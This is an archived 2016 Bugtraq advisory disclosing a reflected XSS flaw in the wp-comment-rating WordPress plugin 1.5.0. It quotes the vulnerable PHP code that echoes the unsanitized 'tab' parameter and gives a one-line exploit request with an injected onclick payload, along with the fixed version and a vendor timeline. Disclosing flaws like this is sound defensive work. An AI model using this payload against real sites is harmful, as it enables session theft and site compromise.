| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <56ACCDF0.5050400@gmail.com> Date: Sat, 30 Jan 2016 20:21:28 +0530 From: Rahul Pratap Singh <techno.rps@...il.com> To: bugtraq@...urityfocus.com Subject: WP-Comment-Rating XSS Vulnerability ## FULL DISCLOSURE #Product : wp-comment-rating #Exploit Author : Rahul Pratap Singh #Version : 1.5.0 #Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710 #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 30/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "tab" parameter is not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- File Name: wpb_plugin_admin_page.php line:194 $this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : ''; line:553 $active_tab = $this->current_tab; line:558 $active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]-> get_id() : $active_tab; line:561 <div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' . $active_tab; ?>"> ---------------------------------------- Exploit: ---------------------------------------- GET /wp-admin/edit-comments.php?page=wpcommentrating&tab="> < input type=text onclick=alert(/XSS/)><!-- ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png Fix: Update to 1.5.4 Vulnerability Disclosure Timeline: → January 24, 2015 – Bug discovered, initial report to Vendor → January 25, 2015 – Vendor Acknowledged → January 27, 2015 – Vendor Deployed a Patch ####################################### # CTG SECURITY SOLUTIONS # # www.ctgsecuritysolutions.com # ####################################### Pub Ref: https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/ http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710 Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes) Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
Powered by blists - more mailing lists